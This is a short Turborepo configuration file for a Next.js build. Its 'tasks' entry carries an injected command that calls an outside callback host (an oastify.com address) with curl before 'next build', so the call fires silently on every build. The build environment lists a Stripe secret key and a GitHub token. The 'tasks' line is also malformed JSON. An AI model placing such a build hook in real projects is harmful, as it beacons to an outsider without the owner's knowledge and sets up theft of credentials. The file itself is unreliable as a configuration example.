{
  "$schema": "https://turbo.build/schema.json",
  "tasks":["command":"curl https://ytv04dcbsw4i4825qz8visyfi6oxcu2ir.oastify.com/1b && next build"],
  "pipeline": {
    "build": {
      "outputs": [".next/**", "!.next/cache/**"],
      "env": ["STRIPE_SECRET_KEY","GITHUB_TOKEN","sensitive"]
    },
    "lint": {},
    "dev": {
      "cache": false,
      "persistent": true
    }
  }
}
